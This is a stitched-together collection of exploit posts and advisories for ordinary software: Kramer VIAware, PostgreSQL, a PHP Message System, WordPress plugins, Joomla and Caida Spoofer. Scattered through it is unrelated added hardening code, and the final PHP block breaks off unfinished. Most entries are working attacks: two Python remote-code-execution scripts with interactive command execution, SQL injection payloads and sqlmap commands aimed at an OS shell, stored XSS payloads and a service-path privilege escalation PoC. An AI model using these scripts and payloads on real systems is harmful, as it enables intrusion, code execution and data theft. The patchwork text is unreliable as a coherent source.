<pre><code># Exploit Title: Spoofer 1.4.6 – Local Privilege Escalation via Unquoted Service Path <br /># Date: 24/01/2022 <br /># Exploit Author: Asim Sattar (@M_Asim_1) <br /># Vendor Homepage: https://www.caida.org/projects/spoofer/ <br /># Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe<br /># Version: 1.4.6 <br /># Tested: Windows 10 (x64) <br /># CVE: CVE-2021-46443<br /><br /><br /><br />Description:<br /><br />-------------<br /><br /><br /><br />Caida Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted<br />service path. Since this service is running as SYSTEM, this creates a local<br />privilege escalation vulnerability. To properly exploit this vulnerability,<br />a local attacker can insert an executable in the path of the service.<br />Rebooting the system or restarting the service will run the malicious<br />executable with elevated privileges.<br /><br /><br /><br />------------------<br /><br />Proof of Concept:<br /><br />------------------<br /><br /><br /><br />C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode |<br />findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br />Spoofer Scheduler spoofer-scheduler C:\Program Files<br />(x86)\Spoofer\spoofer-scheduler.exe Auto<br /><br /><br /><br />C:\Users\asim.sattar>sc qc "spoofer-scheduler"<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br /><br /><br />SERVICE_NAME: spoofer-scheduler<br /><br /> TYPE : 10 WIN32_OWN_PROCESS<br /><br /> START_TYPE : 2 AUTO_START<br /><br /> ERROR_CONTROL : 1 NORMAL<br /><br /> BINARY_PATH_NAME : C:\Program Files<br />(x86)\Spoofer\spoofer-scheduler.exe<br /><br /> LOAD_ORDER_GROUP :<br /><br /> TAG : 0<br /><br /> DISPLAY_NAME : Spoofer Scheduler<br /><br /> DEPENDENCIES : tcpip<br /><br /> SERVICE_START_NAME : LocalSystem<br /><br /><br /><br />Regards,<br /><br />Asim Sattar<br /></code></pre>
<pre><code># Title: Message System 1.0 Blind Time SQLi To RCE<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov//pmms/?page=view_message&id=1<br /># 2 - manually inject the blind SQLi payload: https://0day.gov/pmms/?page=view_message&id=1' OR NOT 515=515#&password=hejap&button=Login<br /># 3 - SQLi To RCE r00t<br /># 4 - Upload webshell<br /># 5 - Web Shell to meterpreter full tty shell<br /><br /># Vulnerable PHP code<br /><br />---<br />```php<br /><?php <br />$qry = $conn->query("SELECT * FROM `conversation_list` where id = '{$_GET['id']}' and (`user_1` = '{$_settings->userdata('id')}' or `user_2` = '{$_settings->userdata('id')}') ");<br />if($qry->num_rows > 0){<br /> foreach($qry->fetch_array() as $k => $v){<br /> if(!is_numeric($k))<br /> $$k = $v;<br /> }<br /> $msg = $conn->query("SELECT m.*,CONCAT(u.firstname,' ', COALESCE(u.middlename,''), ' ', u.lastname) as `name`, u.username, u.avatar FROM `message_list` m inner join users u on m.from_user = u.id where m.conversation_id = '{$id}' order by unix_timestamp(m.date_updated) asc limit 1 ")->fetch_array();<br /> $conn->query("UPDATE `message_list` set `status` = 1 where conversation_id = '{$id}' and to_user = '{$_settings->userdata('id')}'");<br />}<br />else{<br /> echo "<script>alert('ID is unknown or you dont have access to view the Message.'); location.replace('./?page=inbox');</script>";<br />}<br />?><br />```<br />---<br /># Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /pmms/?page=view_message&id=1 HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=fcmu4ss9vhq6760poojbtk40bt<br />Upgrade-Insecure-Requests: 1<br />---<br /><br />```<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_message&id=1' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))sFek) AND 'MXDw'='MXDw<br />---<br /><br /><br />```<br /># Blind time-based SQLi to RCE<br /># Exploit<br /><br /><br />sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D pmms_db -T users --dump --eta --technique=t --hex --os-shell<br /><br /><br /># Description:<br />The blind time-based SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was privesc.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/HfDGPGT.png<br />https://i.imgur.com/6RH1Wvi.png<br /></code></pre>
<pre><code># Title: Message System 1.0 Stored XSS<br /># Author: Hejap Zairy<br /># Date: 29.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Description:<br />Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application and served back to every user who views the stored content. Reflected XSS, by contrast, involves reflecting a malicious script off a web application onto a single user's browser.<br /><br /># Status: CRITICAL<br />[+] Payloads:<br />```<br />https://0day.gov/pmms/?page=manage_message <br />> Subject<br /><img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img><br />```<br /><br /># Proof and Exploit:<br />https://i.imgur.com/ZcoLfS2.png<br />https://i.imgur.com/Fl68YTs.png<br />https://i.imgur.com/2GhIH1a.png<br /></code></pre>
<pre><code>-------------------------------------------------<br />Joomla! <= 4.1.0 (Tar.php) Zip Slip Vulnerability<br />-------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />http://www.joomla.org/<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.1.0 and prior versions.<br />Version 3.10.6 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/libraries/vendor/joomla/archive/src/Tar.php script. Specifically, into <br />the Joomla\Archive\Tar::extract() method:<br /><br />113. $this->getTarInfo($this->data);<br />114.<br />115. for ($i = 0, $n = \count($this->metadata); $i < $n; $i++)<br />116. {<br />117. $type = strtolower($this->metadata[$i]['type']);<br />118.<br />119. if ($type == 'file' || $type == 'unix file')<br />120. {<br />121. $buffer = $this->metadata[$i]['data'];<br />122. $path = Path::clean($destination . '/' . <br />$this->metadata[$i]['name']);<br />123.<br />124. // Make sure the destination folder exists<br />125. if (!Folder::create(\dirname($path)))<br />126. {<br />127. throw new \RuntimeException('Unable to create destination <br />folder ' . \dirname($path));<br />128. }<br />129.<br />130. if (!File::write($path, $buffer))<br />131. {<br />132. throw new \RuntimeException('Unable to write entry to file ' . <br />$path);<br />133. }<br />134. }<br />135. }<br /><br />The vulnerability exists because the above code is using the filename <br />within the Tar archive ($path variable created at line 122) to write the <br />extracted file by using File::write() at line 130, without properly <br />verifying the destination path. This could be exploited to carry out Zip <br />Slip (or Path Traversal) attacks and write/overwrite arbitrary files, <br />potentially resulting in execution of arbitrary PHP code or other <br />dangerous impacts. In the Joomla! 
core, successful exploitation of this <br />vulnerability would require administrator privileges. However, there <br />could be third-party components using the <br />Joomla\Archive\Archive::extract() method. In such cases, this might <br />potentially be exploited also by unauthenticated attackers, depending on <br />the context.<br /><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 3.10.7, 4.1.1, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/02/2021] - Vendor notified<br />[21/02/2021] - Vulnerability acknowledged by the vendor<br />[21/02/2021] - Vendor sent details about a proposed patch<br />[21/02/2021] - Sent feedback about the patch correctness<br />[29/03/2022] - Vendor update released<br />[29/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2022-23793 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://developer.joomla.org/security-centre/870-20220301<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-05<br /><br /></code></pre>
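The check that the Tar::extract() loop above lacks, written out as an added example (this is not Joomla's code): a helper that resolves an archive entry name lexically and refuses anything that would land outside the extraction directory. The name safeExtractPath() and the sample entry list are assumptions; in the loop it would be called where line 122 builds $path.

```php
<?php
// Added example (not Joomla code): resolve an archive entry name against the
// extraction directory and refuse anything that would escape it.
// Works lexically, so it does not need the target file to exist yet
// (realpath() fails on paths that have not been created).
function safeExtractPath(string $destination, string $entryName): string
{
    // Tar/zip entries may use either separator; normalise to '/'.
    $name = str_replace('\\', '/', $entryName);

    // Absolute paths and Windows drive letters ("C:...") are never acceptable
    // for an entry that is supposed to be relative to $destination.
    if ($name === '' || $name[0] === '/' || preg_match('#^[A-Za-z]:#', $name)) {
        throw new RuntimeException("Rejected absolute archive entry: $entryName");
    }

    // Resolve "." and ".." segments without ever climbing above the root.
    $parts = [];
    foreach (explode('/', $name) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if (empty($parts)) {
                throw new RuntimeException("Rejected traversing archive entry: $entryName");
            }
            array_pop($parts);
            continue;
        }
        if (strpos($segment, "\0") !== false) {
            throw new RuntimeException("Rejected NUL byte in archive entry: $entryName");
        }
        $parts[] = $segment;
    }
    if (empty($parts)) {
        throw new RuntimeException("Rejected empty archive entry: $entryName");
    }

    $dest = rtrim(str_replace('\\', '/', $destination), '/');
    return $dest . '/' . implode('/', $parts);
}

// Constructed sample entries: the kinds of names an archive could carry.
$destination = '/var/www/joomla/tmp/extract';
$entries = [
    'plugin/plugin.xml',                        // plain relative name: accepted
    'plugin/./assets/../style.css',             // resolves to plugin/style.css: accepted
    '../../administrator/components/evil.php',  // climbs above the root: rejected
    '/etc/cron.d/evil',                         // absolute: rejected
    'C:\\inetpub\\wwwroot\\evil.php',           // drive letter: rejected
];

foreach ($entries as $entry) {
    try {
        echo str_pad($entry, 45) . ' -> ' . safeExtractPath($destination, $entry) . PHP_EOL;
    } catch (RuntimeException $e) {
        echo str_pad($entry, 45) . ' -> ' . $e->getMessage() . PHP_EOL;
    }
}
```

Because the helper throws before Folder::create() and File::write() run, both only ever see paths under $destination.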
<pre><code># Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS<br /># Date: 2/27/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/easy-cookies-policy/<br /># Version: 1.6.2<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24405<br /><br />1. Description:<br />Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.<br />If users can't register, this can be done through CSRF.<br /><br />2. Proof of Concept:<br />POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0<br />Accept: application/json, text/javascript, /; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 226<br />Origin: http://localhost<br />Connection: keep-alive<br />Host: localhost<br />Cookie: [Any authenticated user]<br /><br />action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd<br /><br /></code></pre>
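The advisory names two missing controls: an authorization check (any authenticated user may save the banner) and a CSRF check (the request can be forged when registration is closed). The following is an added example, not the plugin's code, showing the vulnerable handler shape next to a hardened one for the easy_cookies_policy_save_settings AJAX action seen in the request above; the option name, nonce action string and ecp_ function names are assumptions, and the WordPress helpers used are core functions.

```php
<?php
// Added example, not the plugin's code. Assumes it is loaded inside WordPress.

// Vulnerable shape: trusts whoever is logged in and whatever they send.
function ecp_save_settings_unsafe() {
    update_option( 'easy_cookies_policy_settings', array(
        'maintext' => $_POST['maintext'],   // stored verbatim, e.g. <script>alert(1)</script>
        'position' => $_POST['position'],
    ) );
    wp_send_json_success();
}

// Hardened shape.
function ecp_save_settings_safe() {
    // 1. CSRF: the nonce must come from a form WordPress rendered for this action.
    //    check_ajax_referer() dies with a 403 when the nonce is missing or invalid.
    check_ajax_referer( 'ecp_save_settings', 'ecp_nonce' );

    // 2. Authorization: being logged in is not enough. Require the capability
    //    administrators hold for changing site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    // 3. Input: accept only the expected fields, each reduced to its expected shape.
    $allowed_positions = array( 'top', 'bottom' );
    $position = isset( $_POST['position'] ) ? sanitize_key( wp_unslash( $_POST['position'] ) ) : 'top';
    if ( ! in_array( $position, $allowed_positions, true ) ) {
        $position = 'top';
    }

    $color = isset( $_POST['text_color'] ) ? wp_unslash( $_POST['text_color'] ) : '';
    if ( ! preg_match( '/^#[0-9a-fA-F]{6}$/', $color ) ) {
        $color = '#dddddd';
    }

    $settings = array(
        // wp_kses_post() keeps ordinary HTML for the banner but strips scripts
        // and event handlers, which removes the stored XSS the advisory describes.
        'maintext'   => wp_kses_post( wp_unslash( $_POST['maintext'] ?? '' ) ),
        'position'   => $position,
        'expires'    => absint( $_POST['expires'] ?? 365 ),
        'text_color' => $color,
    );

    update_option( 'easy_cookies_policy_settings', $settings );
    wp_send_json_success( $settings );
}
add_action( 'wp_ajax_easy_cookies_policy_save_settings', 'ecp_save_settings_safe' );

// The settings form must emit the matching nonce field so legitimate saves pass step 1.
function ecp_render_nonce_field() {
    wp_nonce_field( 'ecp_save_settings', 'ecp_nonce' );
}
```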
<pre><code>Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk<br /><br />Plugin Slug: cleantalk-spam-protect<br /><br />Plugin Developer: CleanTalk<br /><br />Affected Versions: <= 5.173<br /><br />CVE ID: CVE-2022-28221<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 5.174.1<br /><br />CleanTalk is a WordPress plugin designed to protect websites from spam comments and registrations. One of the features it includes is the ability to check comments for spam and present the spammy comments for deletion.<br /><br />The plugin uses the column_ct_comment function in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Comments.php to display the list of spam comments, and in doing so generates links to approve, trash, or mark comments as spam using the value supplied in $_REQUEST['page'].<br /><br />Thanks to a quirk of how WordPress processes the page parameter and the default PHP request order, it is possible to use this parameter to perform a reflected cross-site scripting attack, which is almost identical to a vulnerability we recently covered.<br /><br />The vulnerability can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to the site at wp-admin/edit-comments.php?page=ct_check_spam, with the $_POST['page'] parameter set to malicious JavaScript.<br /><br />As with any Cross-Site Scripting vulnerability, executing JavaScript in an administrator's session can be used to take over a site by adding a new malicious administrator or injecting a backdoor, among other potential methods.<br /><br />Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk<br /><br />Plugin Slug: cleantalk-spam-protect<br /><br />Plugin Developer: CleanTalk<br /><br />Affected Versions: <= 5.173<br /><br />CVE ID: CVE-2022-28222<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 5.174.1<br /><br />Similar to the spam comment functionality, CleanTalk also includes a feature that checks for spammy users and presents them in a similar table for review and deletion.<br /><br />In this case the vulnerable function is column_ct_username in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php, which uses the value of $_REQUEST['page'] to generate links to delete potentially spammy users.<br /><br />As with the spam comment vulnerability, if an administrator can be tricked into performing an action, it is possible to use JavaScript running in their browser to take over a site.<br /><br />Timeline<br /><br />February 15, 2022 – The Wordfence Threat Intelligence team finishes our investigation and verifies that the Wordfence firewall's built-in protection is sufficient to block exploit attempts.
We send the full disclosure to a contact at CleanTalk that we have successfully disclosed vulnerabilities to in the past.<br /><br />March 22, 2022 – As we have not yet heard back from our contact, we reported the vulnerability to the WordPress plugins team.<br /><br />March 25, 2022 - A patched version of the plugin, 5.174.1, becomes available.<br /><br />Conclusion<br /><br />In today’s article, we covered two nearly identical reflected Cross-Site Scripting vulnerabilities in the Spam protection, AntiSpam, FireWall by CleanTalk plugin for WordPress. While both of these vulnerabilities require some degree of social engineering, both could be used for site takeover.<br /><br /></code></pre>
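The "quirk" both write-ups rely on can be made concrete. WordPress chooses the admin screen from $_GET['page'], while with PHP's default request_order ("GP") a POST field of the same name overrides the GET value inside $_REQUEST; a table cell built from $_REQUEST['page'] therefore echoes attacker-controlled markup even though the URL itself was untouched. The following is an added illustration, not CleanTalk's code: the build_row_action_link_* names are assumptions, and the safe variant assumes it runs inside WordPress (sanitize_key, wp_unslash, add_query_arg, admin_url, esc_url and esc_html are core functions).

```php
<?php
// Added example, not CleanTalk's code.

// Vulnerable shape: the page slug is read from $_REQUEST and concatenated into
// an href unescaped. WordPress routed this request on $_GET['page'], but a POST
// field named "page" wins inside $_REQUEST and ends up in the markup.
function build_row_action_link_unsafe( int $comment_id, string $action ): string {
    return '<a href="?page=' . $_REQUEST['page'] . '&action=' . $action
        . '&id=' . $comment_id . '">' . $action . '</a>';
}

// Hardened shape: read the slug from the same source WordPress routed on,
// restrict it to slug characters, build the URL with the core helpers and
// escape at output time.
function build_row_action_link_safe( int $comment_id, string $action ): string {
    $page = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : '';
    $url  = add_query_arg(
        array(
            'page'   => $page,
            'action' => $action,
            'id'     => $comment_id,
        ),
        admin_url( 'edit-comments.php' )
    );
    return '<a href="' . esc_url( $url ) . '">' . esc_html( $action ) . '</a>';
}

// Constructed request mirroring the advisory's scenario: a self-submitting form
// POSTs to edit-comments.php?page=ct_check_spam and carries its own "page" field.
// These assignments simulate what PHP populates for such a request.
$_GET['page']     = 'ct_check_spam';
$_POST['page']    = '"><script>alert(1)</script>';
$_REQUEST['page'] = $_POST['page']; // POST overrides GET under request_order "GP"

echo build_row_action_link_unsafe( 42, 'trash' ) . PHP_EOL;
// The closing quote and script tag from $_POST['page'] land in the page verbatim.

echo build_row_action_link_safe( 42, 'trash' ) . PHP_EOL;
// The href carries only page=ct_check_spam, action and id, fully escaped.
```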
<pre><code># Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)<br /># Date: 28/03/2022<br /># Exploit Author: sharkmoos & BallO<br /># Vendor Homepage: https://www.kramerav.com/<br /># Software Link: https://www.kramerav.com/us/product/viaware<br /># Version: 2.5.0719.1034<br /># Tested on: ViaWare Go (Windows 10)<br /># CVE : CVE-2019-17124<br /><br />import requests, sys, urllib3<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />def adminLogin(s, host, username, password):<br /> headers = {<br /> "Host": f"{host}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-GB,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Origin": f"https://{host}",<br /> "Referer": f"https://{host}/admin/login.php",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Sec-Gpc": "1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /> data = {<br /> "txtUserId": username,<br /> "txtPwd": password,<br /> "btnOk" :"Login"<br /> }<br /> response = s.post(f"https://{host}/admin/login.php", verify=False)<br /> if len(s.cookies) < 1:<br /> return False<br /> else:<br /> return True<br /><br /><br />def writeCommand(session, host, command):<br /> headers = {<br /> "Host": f"{host}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br /> "Accept": "text/html, */*",<br /> "Accept-Language": "en-GB,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Origin": f"https://{host}",<br 
/> "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",<br /> "Sec-Fetch-Dest": "empty",<br /> "Sec-Fetch-Mode": "cors",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Gpc": "1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /> data = {<br /> "radioBtnVal":f"{command}",<br /> "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"<br /> }<br /> session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data)<br /><br /><br />def getResult(session, host):<br /> file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)<br /> pageText = file.text<br /> if len(pageText) < 1:<br /> result = "Command did not return a result"<br /> else:<br /> result = pageText<br /> return result<br /><br /> <br /><br />def main(host, username="su", password="supass"):<br /> s = requests.Session()<br /> # comment this line to skip the login stage <br /> loggedIn = adminLogin(s, host, username, password)<br /> <br /> if not loggedIn:<br /> print("Could not successfully login as the admin")<br /> sys.exit(1)<br /> else:<br /> pass<br /><br /> command = ""<br /> while command != "exit":<br /> command = input("cmd:> ").strip()<br /> writeCommand(s, host, command)<br /> print(getResult(s, host))<br /> exit()<br /><br />if __name__ == "__main__":<br /> <br /> args = sys.argv<br /> numArgs = len(args)<br /> if numArgs < 2:<br /> print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")<br /> print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")<br /> if numArgs == 2:<br /> main(args[1])<br /> if numArgs == 4:<br /> main(args[1], args[2], args[3])<br /> if numArgs > 4:<br /> print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")<br /> print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-03-29<br /># Exploit Author: b4keSn4ke<br /># Github: https://github.com/b4keSn4ke<br /># Vendor Homepage: https://www.postgresql.org/<br /># Software Link: https://www.postgresql.org/download/linux/debian/<br /># Version: 9.3 - 11.7<br /># Tested on: Linux x86-64 - Debian 4.19<br /># CVE: CVE-2019–9193<br /><br />#!/usr/bin/python3 <br /><br />import psycopg2<br />import argparse<br />import hashlib<br />import time<br /><br />def parseArgs():<br /> parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')<br /> parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')<br /> parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')<br /> parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]')<br /> parser.add_argument('-c', '--command', nargs='?', help='System command to run')<br /> parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]')<br /> parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')<br /> parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')<br /> args = parser.parse_args()<br /> return args<br /><br />def main():<br /> try:<br /> print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port))<br /> connection = psycopg2.connect (<br /> database=args.database, <br /> user=args.user, <br /> password=args.password, <br /> host=args.ip, <br /> port=args.port, <br /> 
connect_timeout=args.timeout<br /> )<br /> print ("[+] Connection to Database established")<br /> <br /> print ("[+] Checking PostgreSQL version")<br /> checkVersion(connection)<br /><br /> if(args.command):<br /> exploit(connection)<br /> else:<br /> print ("[+] Add the argument -c [COMMAND] to execute a system command")<br /><br /> except psycopg2.OperationalError as e:<br /> print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e))<br /> exit()<br /><br />def checkVersion(connection):<br /> cursor = connection.cursor()<br /> cursor.execute("SELECT version()")<br /> record = cursor.fetchall()<br /> cursor.close()<br /><br /> result = deserialize(record)<br /> version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4])<br /><br /> if (version >= 9.3 and version <= 11.7):<br /> print("[+] PostgreSQL {0} is likely vulnerable".format(version))<br /><br /> else:<br /> print("[-] PostgreSQL {0} is not vulnerable".format(version))<br /> exit()<br /><br />def deserialize(record):<br /> result = ""<br /> for rec in record:<br /> result += rec[0]+"\r\n"<br /> return result<br /><br />def randomizeTableName():<br /> return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest())<br /><br />def exploit(connection):<br /> cursor = connection.cursor()<br /> tableName = randomizeTableName()<br /> try:<br /> print ("[+] Creating table {0}".format(tableName))<br /> cursor.execute("DROP TABLE IF EXISTS {1};\<br /> CREATE TABLE {1}(cmd_output text);\<br /> COPY {1} FROM PROGRAM '{0}';\<br /> SELECT * FROM {1};".format(args.command,tableName))<br /><br /> print ("[+] Command executed\r\n")<br /> <br /> record = cursor.fetchall()<br /> result = deserialize(record)<br /><br /> print(result)<br /> print ("[+] Deleting table {0}\r\n".format(tableName))<br /><br /> cursor.execute("DROP TABLE {0};".format(tableName))<br /> cursor.close()<br /><br /> except psycopg2.errors.ExternalRoutineException as e:<br /> print ("[-] Command failed : 
{0}".format(e.pgerror))<br /> print ("[+] Deleting table {0}\r\n".format(tableName))<br /> cursor = connection.cursor()<br /> cursor.execute("DROP TABLE {0};".format(tableName))<br /> cursor.close()<br /><br /> finally:<br /> exit()<br /><br />if __name__ == "__main__":<br /> args = parseArgs()<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Medical Hub Directory Site - 'id' SQL Injection<br /># Date: 30/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Vulnerable Code<br /><br />line 9 in file "/mhds/clinic/view_details.php"<br /><br />$categories = $conn->query("SELECT c.category_id,cc.name as category FROM clinic_category c inner join category_list cc on c.category_id = cc.id where c.clinic_id = '{$id}' ")->fetch_all(MYSQLI_ASSOC);<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/mhds/?page=clinic/view_details&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=clinic/view_details&id=1' AND 8622=8622-- pBEY<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=clinic/view_details&id=1' AND (SELECT 9741 FROM (SELECT(SLEEP(5)))AmHc)-- Gwec<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 10 columns<br /> Payload: page=clinic/view_details&id=-4315' UNION ALL SELECT CONCAT(0x71717a7071,0x4d5246716246517044556c4d4a584f5853646d526a6957666463567a514f73504745636759635454,0x71786a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /></code></pre>
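Both the Message System view_message.php query above and the Medical Hub view_details.php query here interpolate the id parameter straight into SQL. The following is an added example of the same three queries as prepared statements; it is not the project's code, and it assumes $conn is the mysqli connection both applications already use (with mysqlnd, so that get_result() is available).

```php
<?php
// Added example, not the project's code. Prepared statements send the SQL and
// the values separately, so a quote in $_GET['id'] can no longer change the query.

// view_message.php: return the conversation only if the caller is a participant.
// Returning the row instead of exporting its columns as variables ($$k = $v in
// the original) also stops a column name from shadowing an existing variable.
function loadConversation(mysqli $conn, string $rawId, int $userId): ?array {
    // The id column is numeric; refuse anything else before touching the database.
    if (!ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;

    $stmt = $conn->prepare(
        'SELECT * FROM `conversation_list` WHERE id = ? AND (`user_1` = ? OR `user_2` = ?)'
    );
    $stmt->bind_param('iii', $id, $userId, $userId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Marking messages read: the conversation id is now the trusted integer taken
// from the row above, not request input.
function markConversationRead(mysqli $conn, int $conversationId, int $userId): int {
    $stmt = $conn->prepare(
        'UPDATE `message_list` SET `status` = 1 WHERE conversation_id = ? AND to_user = ?'
    );
    $stmt->bind_param('ii', $conversationId, $userId);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

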